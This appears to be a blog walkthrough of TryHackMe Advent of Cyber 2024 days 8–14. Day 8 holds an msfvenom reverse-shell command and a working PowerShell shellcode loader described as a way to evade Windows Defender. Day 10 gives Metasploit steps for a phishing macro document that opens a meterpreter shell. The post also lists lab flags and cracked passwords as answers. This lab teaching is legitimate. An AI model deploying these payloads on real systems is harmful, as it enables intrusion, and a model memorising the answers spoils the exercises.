TryHackMe Advent of Cyber 2024 Full Walkthrough Part 2

Motasem Hamdan
19 min readDec 15, 2024

--

In this post, I will be writing the second part of TryHackMe Advent of Cyber 2024 Full Walkthrough starting from Day 7. You can find the first part from this link.

What is TryHackMe Advent of Cyber 2024

TryHackMe Advent of Cyber 2024 is open to all TryHackMe users, and the best part? It’s completely free to join. Plus, you’ll have the opportunity to win a share of this year’s massive $100,000 prize pool. The more challenges you complete, the greater your chances of scoring big prizes!

It’s like an advent calendar, but instead of chocolates, you’ll enjoy festive and engaging security challenges.

Day 8: Shellcodes of the world, unite!

Day 8 Storyline:

Glitch, a skilled but mistrusted hacker, was prepping for a tech conference. He was eager to share his shellcode script that remotely accessed his home system. As he worked, he noticed Mayor Malware’s henchmen lurking nearby.

“They’re wasting their time. I don’t have anything they’d want,” Glitch chuckled.

He didn’t realise that hidden in his home system was something they desperately sought — a research paper he wrote on Wareville’s defences, a treasure Mayor Malware was eager to obtain.

Learning Objectives

  • Grasp the fundamentals of writing shellcode
  • Generate shellcode for reverse shells
  • Executing shellcode with PowerShell

Walkthrough

Essential Terminologies

  • Shellcode: A piece of code usually used by malicious actors during exploits like buffer overflow attacks to inject commands into a vulnerable system, often leading to executing arbitrary commands or giving attackers control over a compromised machine. Shellcode is typically written in assembly language and delivered through various techniques, depending on the exploited vulnerability.
  • PowerShell: A powerful scripting language and command-line shell built into Windows for task automation and configuration management. It allows users to interact with system components and is widely used by administrators for legitimate purposes. However, attackers often use PowerShell as a post-exploitation tool because of its deep access to system resources and ability to run scripts directly in memory, avoiding disk-based detection mechanisms.
  • Windows Defender: A built-in security feature that detects and prevents malicious scripts, including PowerShell-based attacks, by scanning code at runtime. Common bypass methods for evading Defender include obfuscating scripts to disguise malicious content, making it harder for the software to recognise known patterns. Another technique is a reflective injection, where malicious code is loaded directly into memory, avoiding detection by signature-based defences. We will cover the latter one in this task.
  • Windows API: The Windows Application Programming Interface (API) allows programs to interact with the underlying operating system, giving them access to essential system-level functions such as memory management, file operations, and networking. It serves as a bridge between the application and the operating system, enabling efficient resource handling. The Windows API is crucial because many exploitation techniques and malware rely on it to manipulate processes, allocate memory, and execute shellcodes. Common Windows API functions frequently used by malicious actors include VirtualAlloc, CreateThread, WaitForSingleObject, which we will also use in this task for exploitation.
  • Accessing Windows API through PowerShell Reflection: Windows API via PowerShell Reflection is an advanced technique that enables dynamic interaction with the Windows API from PowerShell. Instead of relying on precompiled binaries, PowerShell Reflection allows attackers to call Windows API functions directly at runtime. This will enable them to manipulate low-level system processes, making it a primary tool for bypassing security mechanisms, interacting with the operating system, and executing code stealthily.
  • Reverse shell: A type of connection in which the target (the machine you’re trying to hack) initiates a connection back to your attacking machine (in this case, your machine will be the AttackBox).

Generating Shellcode

Let’s explore how to create a shellcode to understand its structure. We’ll use a tool called msfvenom to generate a reverse shell.

In the AttackBox, open the terminal and run the following command:

msfvenom -p windows/x64/shell_reverse_tcp LHOST=ATTACKBOX_IP LPORT=1111 -f powershell

This command will produce the shellcode for the reverse shell.

The command above generates a piece of shellcode using msfvenom. Here’s a breakdown of each component:

  • -p windows/x64/shell_reverse_tcp: The -p option specifies the payload type to create. In this case, windows/x64/shell_reverse_tcp generates a reverse shell payload for a 64-bit Windows system.
  • LHOST=ATTACKBOX_IP: This sets the AttackBox’s IP address, which the reverse shell will use to establish a connection back to the attacker’s system.
  • LPORT=1111: This defines the port number on the attacker’s machine that will be used to listen for incoming connections from the reverse shell. In this example, port 1111 is used, but it can be any available port, as long as it matches the listener configuration.
  • -f powershell: This specifies the output format. Here, the payload is formatted for PowerShell, enabling it to be executed as a script on a Windows machine.

The shellcode referenced in the output above is a hex-encoded byte array, beginning with values like 0xfc, 0xe8, 0x82, and so on. These hexadecimal numbers represent machine instructions that the target system can execute. While computers operate in binary (1s and 0s), hexadecimal serves as a more human-readable representation, making it easier to interpret sequences like 0xfc rather than long binary strings.

To execute this shellcode, we can load it into memory and create a thread to run it. For this example, we will use PowerShell to leverage a few Windows APIs through C# code. Here’s a straightforward PowerShell script to execute the shellcode:

$VrtAlloc = @"
using System;
using System.Runtime.InteropServices;
public class VrtAlloc{
[DllImport("kernel32")]
public static extern IntPtr VirtualAlloc(IntPtr lpAddress, uint dwSize, uint flAllocationType, uint flProtect);
}
"@
Add-Type $VrtAlloc $WaitFor= @"
using System;
using System.Runtime.InteropServices;
public class WaitFor{
[DllImport("kernel32.dll", SetLastError=true)]
public static extern UInt32 WaitForSingleObject(IntPtr hHandle, UInt32 dwMilliseconds);
}
"@
Add-Type $WaitFor$CrtThread= @"
using System;
using System.Runtime.InteropServices;
public class CrtThread{
[DllImport("kernel32", CharSet=CharSet.Ansi)]
public static extern IntPtr CreateThread(IntPtr lpThreadAttributes, uint dwStackSize, IntPtr lpStartAddress, IntPtr lpParameter, uint dwCreationFlags, IntPtr lpThreadId);

}
"@
Add-Type $CrtThread
[Byte[]] $buf = SHELLCODE_PLACEHOLDER
[IntPtr]$addr = [VrtAlloc]::VirtualAlloc(0, $buf.Length, 0x3000, 0x40)
[System.Runtime.InteropServices.Marshal]::Copy($buf, 0, $addr, $buf.Length)
$thandle = [CrtThread]::CreateThread(0, 0, $addr, 0, 0, 0)
[WaitFor]::WaitForSingleObject($thandle, [uint32]"0xFFFFFFFF")

The script begins by defining several C# classes, which utilize the DllImport attribute to import specific functions from the kernel32.dll, a component of the Windows API.

  • VirtualAlloc: Allocates memory within the process’s address space. This is often used to prepare memory for storing and running shellcode.
  • CreateThread: Initiates a new thread in the process to execute the shellcode loaded into memory.
  • WaitForSingleObject: Suspends execution until a designated thread completes its task, ensuring that the shellcode finishes executing.

These classes are then integrated into PowerShell using the Add-Type command, enabling PowerShell to invoke these functions.

Next, the script assigns the shellcode to the $buf variable, storing it as a byte array. In the example provided, SHELLCODE_PLACEHOLDER acts as a marker indicating where you would insert the actual shellcode generated earlier using msfvenom. Typically, this placeholder is replaced with the actual shellcode, represented as a sequence of hexadecimal values. These hex values contain the instructions that will be executed when the shellcode is run.

The script uses the VirtualAlloc function to allocate memory for storing the shellcode. The function is called with the following parameters:

  • 0 for the memory address, allowing Windows to select the location for allocation.
  • $size, which specifies the size of the memory block based on the shellcode’s length.
  • 0x3000 as the allocation type, instructing Windows to reserve and commit the memory.
  • 0x40 for memory protection, ensuring the allocated memory is both readable and executable, which is essential for executing the shellcode.

Once memory is allocated, the Marshal.Copy function transfers the shellcode from the $buf array to the allocated memory location ($addr), making it ready for execution.

Once the shellcode is loaded into memory, the script invokes the CreateThread function to execute it by creating a new thread. This thread is configured to begin execution at the memory address where the shellcode resides ($addr). Subsequently, the script calls the WaitForSingleObject function to pause and wait until the shellcode execution completes. This ensures the shellcode finishes running entirely before the script terminates.

TryHackMe Advent of Cyber 2024 Day 8 Answers

What is the flag value once Glitch gets reverse shell on the digital vault using port 4444? Note: The flag may take around a minute to appear in the C:\Users\glitch\Desktop directory. You can view the content of the flag by using the command type C:\Users\glitch\Desktop\flag.txt.

AOC{GOT _MY_ACCESS_B@CK007}

Day 9: Nine o’clock, make GRC fun, tell no one.

Day 9 Storyline

McSkidy and Glitch want to hire an eDiscovery company to process some forensic data for their investigation. They have invited bids from third parties for this purpose. Three companies have bid for the project. McSkidy and Glitch now need to do a risk assessment on all three of these companies to identify the one with the least amount of risk so that they can move forward. All three companies were required to fill out a questionnaire based on which a risk assessment will be done.

Introduction to GRC

Governance, Risk, and Compliance (GRC): A Cornerstone for Organisational Security

GRC is vital for organisations to ensure their security practices are in alignment with personal, regulatory, and legal obligations. While strong security practices inherently reduce the risk of breaches, organisations must also comply with sector-specific external regulations. For instance, the financial sector is governed by numerous security requirements:

  • Reserve Bank Regulations: Banks must follow security mandates set by their country’s reserve bank, ensuring a baseline level of security to safeguard customer funds and data.
  • SWIFT Customer Security Programme (CSP): After an $81 million SWIFT transfer fraud, SWIFT introduced the CSP to standardise security for banks using its network.
  • Data Protection Standards: Given their access to sensitive customer data, banks must comply with data protection standards, often regulated by their country’s reserve bank.

Managing compliance with these regulations across diverse teams can be challenging. This is where GRC comes in, providing a structured approach to interpret external security requirements, translate them into internal policies, and enforce their consistent application across the organisation. GRC helps minimise risks and ensures the organisation meets its security obligations. Below are the three core components of GRC:

1. Governance

Governance involves developing the framework for making security-related decisions. This includes formulating the organisation’s security strategy, policies, standards, and practices to align with its overall objectives. Governance also defines roles and responsibilities to ensure the implementation and maintenance of these standards.

2. Risk

Risk management identifies, assesses, quantifies, and mitigates threats to the organisation’s IT assets. It helps uncover vulnerabilities, evaluate their potential impact, and implement measures to reduce risks to an acceptable level. For instance, simply using IT systems introduces cyber risks. Risk management enables organisations to prepare for and respond to cyber threats, reducing the likelihood and impact of incidents.

3. Compliance

Compliance ensures the organisation meets external legal, regulatory, and industry standards, such as GDPR, NIST, or ISO 27001. This function ensures that the organisation’s security practices align with all required frameworks, safeguarding against non-compliance penalties and enhancing overall security posture.

By integrating these functions, GRC enables organisations to navigate complex security landscapes while mitigating risks and maintaining regulatory adherence.

TryHackMe Advent of Cyber 2024 Day 9 Answers

What does GRC stand for?

Governance, Risk, and Compliance

What is the flag you receive after performing the risk assessment?

THM{R15K_M4N4G3D}

Day 10: He had a brain full of macros, and had shells in his soul

TryHackMe Advent of Cyber 2024 Day 10 Storyline

Mayor Malware attempts to phish one of the SOC-mas organizers by sending a document embedded with a malicious macro. Once opened, the macro will execute, giving the Mayor remote access to the organizer’s system.

Marta May Ware is surprised that her system was compromised even after following tight security, but McSkidy thinks she traced the attacker, and he got in. It’s none other than Mayor Malware who got into the system. This time, the Mayor used phishing to get his victim. McSkidy’s quick incident response prevented significant damage.

In this task, you will run a security assessment against Marta May Ware. The purpose would be to improve her security and raise her cyber security awareness against future attacks.

Glitch is still concerned about any future attack on Marta May Ware and advises McSkidy to run a phishing exercise on her to verify whether she is vigilant about these attacks.

Phishing Attacks

Security is only as strong as its weakest link, and many believe that humans represent that weakest link in the security chain. For example, is it harder to breach a patched system protected by a firewall, or to persuade someone to open an “urgent” document? This makes “human hacking,” a form of social engineering, one of the easiest attack methods to execute.

Phishing, a term derived from “fishing,” doesn’t involve seafood but instead refers to an attacker casting out bait to a large group of users. These messages are often crafted with a sense of urgency, pressuring recipients to act quickly without thinking critically. The goal is typically to steal sensitive information or deploy malware by convincing users to complete actions like filling out a form, clicking a link, or opening a file.

For instance, you might receive an unsolicited email claiming a large charge has been made to your account, prompting you to check an attached file or URL for more details. Once the malicious file is opened or the link is clicked, the attack is activated, potentially giving the attacker control over your system.

Macros

The requirements of MS Office users can vary widely, making it impossible for a default installation to meet everyone’s needs. Some users frequently perform repetitive tasks, such as formatting, inserting text, or conducting calculations. For instance, converting numbers into words — like turning “1337” into “one thousand three hundred thirty-seven” — can be incredibly time-consuming when dealing with large quantities. This highlights the need for an automated solution to save time and minimize manual effort.

In computing, a macro is a set of programmed instructions designed to streamline repetitive tasks. MS Word, along with other MS Office applications, allows users to incorporate macros into documents. These macros often provide significant time-saving benefits. However, in the realm of cybersecurity, such automated tools can be exploited for malicious purposes.

Creating the Malicious Document

The initial step involves embedding a malicious macro into the document. Alternatively, the Metasploit Framework can be used to create such a document, eliminating the need for a system with MS Office installed.

To create the document with the malicious macro using the Metasploit Framework, follow these steps:

  1. Launch Metasploit Framework: Open a new terminal window and run msfconsole to start the Metasploit Framework.
  2. Set the Payload: Use the command set payload windows/meterpreter/reverse_tcp to specify the payload, which establishes a reverse shell by connecting to the specified host.
  3. Select the Module: Use the command use exploit/multi/fileformat/office_word_macro to choose the module for creating a document with an embedded macro. Note that this is technically not an exploit but a module designed for this purpose.
  4. Configure LHOST: Set the attacker’s IP address with the command set LHOST CONNECTION_IP, where CONNECTION_IP represents the IP address of the AttackBox.
  5. Configure LPORT: Specify the listening port on the AttackBox with the command set LPORT 8888.
  6. Verify Settings: Use the show options command to review and confirm that the IP address and port number are correctly configured.
  7. Generate the Document: Execute the exploit command to create a document with the malicious macro embedded.
  8. Exit: Use the exit command to quit Metasploit and return to the terminal.

This process will create a document with a malicious macro, ready for deployment.

TryHackMe Advent of Cyber 2024 Day 10 Answers

What is the flag value inside the flag.txt file that’s located on the Administrator’s desktop?

THM{PHISHING_CHRISTMAS}

Day 11: If you’d like to WPA, press the star key!

TryHackMe Advent of Cyber 2024 Day 11 Storyline

The much-awaited SOC-mas of Wareville town is just days away! Glitch, the unsung hero, is closing all the doors to Mayor Malware’s malicious intentions one by one. However, there is still much more to do.

McSkidy took a thoughtful breath. “Mayor can still find his way in!”

Glitch smiles confidently. “I think I know the last technique he relies on to get into the networks.”

McSkidy stands up from her chair with a surge of excitement. “Let me guess, it’s a notorious way to get into a network — a Wi-Fi attack?!”

Glitch nods decisively. “Exactly! Let’s be one step ahead of the Mayor.”

Learning Objectives

  • Understand what Wi-Fi is
  • Explore its importance for an organisation
  • Learn the different Wi-Fi attacks
  • Learn about the WPA/WPA2 cracking attack

WiFi Basics

The significance of the Internet in our daily lives is universally understood and requires no explanation. Wi-Fi serves as the technology that connects our devices to this vast global network, the Internet. While the connection between our devices and the Internet may seem entirely wireless, this is only partly true. Our devices connect wirelessly to a router, which serves as a bridge to the Internet, and the router itself is linked to the Internet through a wired connection.

To access Wi-Fi, we activate it on our devices, which then display a list of available Wi-Fi networks in the vicinity. This list consists of access points (usually routers) broadcasting Wi-Fi signals with a unique SSID, or network name. You can connect to any of these networks if you have the correct password, also referred to as a pre-shared key (PSK). Once connected, your device is assigned an IP address within that network, acting as a unique identifier to facilitate communication with other devices. It is similar to becoming part of a family where you are given a trusted, recognizable name.

Most organizations depend on the Internet for their business operations. Connecting all employees to the Internet through wired connections raises concerns regarding cost, efficiency, and workplace flexibility. As a result, many organizations opt for Wi-Fi networks to provide employees with Internet access. When employees connect to the organization’s network, they create a network of interconnected devices that can communicate with one another, enabling them to make and respond to requests seamlessly. To prevent misuse of network privileges, organizations typically hire reliable and professional employees.

Despite these precautions, a malicious outsider can still detect the organization’s broadcasted Wi-Fi SSID when scanning for networks. While this may not appear to be an issue since the attacker doesn’t have the password, they may have other intentions in mind!

WiFi Attacks

Attackers use several techniques to exploit Wi-Fi technology. It’s important to note that the information provided here is strictly for educational purposes. Unauthorized attempts to access or compromise networks are illegal and can result in severe legal consequences. With that in mind, here are some of the most common techniques:

  1. Evil Twin Attack:
    In this attack, the attacker creates a counterfeit Wi-Fi access point with a name resembling a trusted one. For instance, if your Wi-Fi is called “Home_Internet,” the attacker might set up a fake access point named “Home_Internnet” or something similarly misleading. The attack begins with the attacker sending de-authentication packets to disconnect users from the legitimate network. Frustrated by the repeated disconnections, users might check the available Wi-Fi networks and unknowingly connect to the attacker’s fake access point, often attracted by its stronger signal. Once connected, the attacker can monitor the user’s internet traffic.
  2. Rogue Access Point:
    This attack has a similar goal to the evil twin attack. Here, the attacker sets up an open Wi-Fi access point near or within an organization’s premises. Users, especially those whose devices automatically connect to open Wi-Fi networks, may inadvertently join this rogue access point. Once connected, the attacker can intercept and monitor all their communication.
  3. WPS Attack:
    Wi-Fi Protected Setup (WPS) simplifies the process of connecting to Wi-Fi networks using an 8-digit PIN instead of a complex password. Unfortunately, this PIN system can be exploited on certain networks due to insecure configurations. Attackers initiate a WPS handshake with the router and capture its response, which contains data related to the PIN. They then use brute-force techniques to extract the PIN and gain access to the Pre-Shared Key (PSK).
  4. WPA/WPA2 Cracking:
    Wi-Fi Protected Access (WPA) and its successor WPA2 are designed to secure wireless communication using strong encryption. However, the security depends heavily on the strength of the Pre-Shared Key (PSK). Attackers exploit this by sending de-authentication packets to disconnect a legitimate user from the Wi-Fi network. When the user attempts to reconnect, a 4-way handshake with the router occurs. The attacker, using a device in monitor mode, captures this handshake. The captured data is then subjected to brute-force or dictionary attacks to crack the Wi-Fi password.

Understanding these techniques highlights the importance of implementing strong security measures for Wi-Fi networks to minimize vulnerabilities.

TryHackMe Advent of Cyber 2024 Day 11 Answers

What is the BSSID of our wireless interface?

02:00:00:00:02:00

What is the SSID and BSSID of the access point? Format: SSID, BSSID

MalwareM_AP, 02:00:00:00:00:00

What is the BSSID of the wireless interface that is already connected to the access point?

02:00:00:00:01:00

What is the PSK after performing the WPA cracking attack?

fluffy/champ24

Day 12: If I can’t steal their money, I’ll steal their joy!

Day 12 Storyline:

Wareville’s bank had a huge turnover this year and expected a massive profit before the holiday season. They were eager to disclose this news to the town’s people during the SOC-mas celebrations. However, to their surprise, things went the other way around. After completing the annual calculations, the accountants were shocked to see a considerable loss. They observed discrepancies in the account balances.

The bank called McSkidy to help investigate these users’ fraudulent transactions. Upon analysing the bank’s website’s transactional logs, McSkidy found some interesting transactions. Few users, including the Mayor’s team initiated multiple transactions from Wareville’s reserve accounts at once. Surprisingly, all these transactions succeeded despite exceeding the users’ current balance. Glitch was already aware of the critical vulnerability (allowing these fraudulent transactions) that Mayor Malware and his alliances exploited.

Learning Objectives

  • Understand the concept of race condition vulnerabilities
  • Identify the gaps introduced by HTTP2
  • Exploit race conditions in a controlled environment
  • Learn how to fix the race

Web Timing and Race Conditions

Conventional web applications are relatively straightforward to understand, analyze, and exploit. If there’s an issue in the application’s code, we can manipulate it into performing unintended actions by sending specific inputs. These vulnerabilities are easier to grasp because there’s often a direct correlation between the input and the output — sending flawed input results in flawed output, clearly indicating a problem. But what if vulnerabilities could be discovered using only valid data? What if the issue lies not in the data itself but in the way it’s delivered? This is where web timing and race condition attacks come into play. Let’s explore this fascinating and often overlooked attack vector!

At its core, a web timing attack involves extracting information from a web application by analyzing how long it takes to process requests. By making subtle adjustments to the data we send or the way we send it, and then measuring the response times, we can uncover unauthorized information.

Race conditions represent a specialized form of web timing attack. These go beyond just accessing sensitive data; they enable attackers to manipulate the application into performing unintended actions on their behalf.

Web timing vulnerabilities can be extremely subtle. Research shows that response time differences as small as 1300ms down to 5ns have been exploited in attacks. Their nuanced nature makes them difficult to detect, often requiring diverse testing techniques. However, with the growing adoption of HTTP/2, identifying and exploiting these vulnerabilities has become somewhat easier.

Timing attacks are often categorized into two primary types:

Information Disclosures

By exploiting differences in response times, an attacker can gain access to information that should remain confidential. For instance, variations in timing can be used to deduce valid usernames in an application, paving the way for password-guessing attempts and unauthorized account access.

Race Conditions

Race conditions, akin to business logic flaws, enable an attacker to trigger unintended actions in an application. However, the underlying issue lies in how the web application handles requests, which creates the opportunity for a race condition. For example, repeatedly submitting the same coupon request simultaneously might allow it to be applied multiple times.

TryHackMe Advent of Cyber 2024 Day 12 Answers

What is the flag value after transferring over $2000 from Glitch’s account?

THM{WON_THE_RACE_007}

Day 13: It came without buffering! It came without lag!

Day 13 Storyline:

Wares are all about security. The Glitch discovers that an app is illegally tracking the cars in Wareville. Not many car thefts in the city warrant such an extreme measure. He reaches out to McSkidy to investigate and identify how the application is tracking them and leaking users’ positions.

Learning Objectives

  • Learn about WebSockets and their vulnerabilities.
  • Learn how WebSocket Message Manipulation can be done.

Introduction to WebSocket

WebSockets allow your browser and server to maintain a continuous connection for communication. Unlike the traditional approach of making a request, receiving a response, and disconnecting, WebSockets function like an open phone line, enabling real-time exchanges as needed. Once the connection is established, both the client and server can interact freely without repeated requests.

This makes WebSockets ideal for applications like live chat, real-time gaming, or any service that requires continuous updates. After an initial handshake to establish the connection, either side can send messages anytime, reducing overhead and enabling faster, more efficient data exchange for real-time needs.

Traditional HTTP Requests vs. WebSocket

When you use regular HTTP, your browser sends a request to the server, and the server responds, then closes the connection. If you need new data, you have to make another request. Think of it like knocking on someone’s door every time you want something — they’ll answer, but it can get tiring if you need updates constantly.

Take a chat app as an example. With HTTP, your browser would keep asking, “Any new messages?” every few seconds. This method, known as polling, works but isn’t efficient. Both the browser and the server end up doing a lot of unnecessary work just to stay updated.

WebSockets handle things differently. Once the connection is established, it remains open, allowing the server to push updates to you whenever there’s something new. It’s more like leaving the door open so updates can come in immediately without the constant back-and-forth. This approach is faster and uses fewer resources.

WebSocket Vulnerabilities

While WebSockets can improve performance, they also present security challenges that developers must address. Since WebSocket connections remain open and active, they can be exploited if appropriate security measures are not implemented. Below are some common vulnerabilities:

  1. Weak Authentication and Authorization: Unlike standard HTTP, WebSockets lack built-in mechanisms for user authentication or session validation. Without proper controls, attackers may gain unauthorized access to sensitive information or manipulate the connection.
  2. Message Tampering: The continuous data flow in WebSockets creates opportunities for attackers to intercept and alter messages if encryption is not employed. This can lead to malicious command injection, unauthorized actions, or corrupted data exchanges.
  3. Cross-Site WebSocket Hijacking (CSWSH): This occurs when an attacker deceives a user’s browser into initiating a WebSocket connection with another site. If successful, the attacker can potentially hijack the connection or access data intended for the legitimate server.
  4. Denial of Service (DoS): WebSocket connections’ persistent nature makes them susceptible to DoS attacks. An attacker could overwhelm the server with excessive messages, leading to performance degradation or a complete server crash.

TryHackMe Advent of Cyber 2024 Day 13 Answers

What is the value of Flag1?

THM{dude_where_is_my_car}

What is the value of Flag2?

THM{my_name_is_malware._mayor_malware}

Day 14: Even if we’re horribly mismanaged, there’ll be no sad faces on SOC-mas!

Day 14 Storyline

It’s a quiet morning in the town of Wareville. A wholesome town where cheer and tech come together. McSkidy is charged to protect the GiftScheduler, the service elves use to schedule all the presents to be delivered in Wareville. She assigned Glitch to the case to make sure the site is secure for G-Day (Gift Day). In the meantime, Mayor Malware works tirelessly, hoping to not only ruin Christmas by redirecting presents to the wrong addresses but also to ensure that Glitch is blamed for the attack. After all, Glitch’s warnings about the same vulnerabilities Mayor Malware is exploiting make the hacker an easy scapegoat.

Learning Objectives

Self-signed certificates

Man-in-the-middle attacks

Using Burp Suite proxy to intercept traffic

TryHackMe Advent of Cyber Day 14 Answers

What is the name of the CA that has signed the Gift Scheduler certificate?

THM

Look inside the POST requests in the HTTP history. What is the password for the snowballelf account?

c4rrotn0s3

Use the credentials for any of the elves to authenticate to the Gift Scheduler website. What is the flag shown on the elves’ scheduling page?

THM{AoC-3lf0nth3Sh3lf}

What is the password for Marta May Ware’s account?

H0llyJ0llySOCMAS!

Mayor Malware finally succeeded in his evil intent: with Marta May Ware’s username and password, he can finally access the administrative console for the Gift Scheduler. G-Day is cancelled!
What is the flag shown on the admin page?

THM{AoC-h0wt0ru1nG1ftD4y}

Video Walkthrough

--

--

Motasem Hamdan
Motasem Hamdan

Written by Motasem Hamdan

Motasem Hamdan is a content creator and swimmer who creates cyber security training videos and articles. https://www.youtube.com/@MotasemHamdan

No responses yet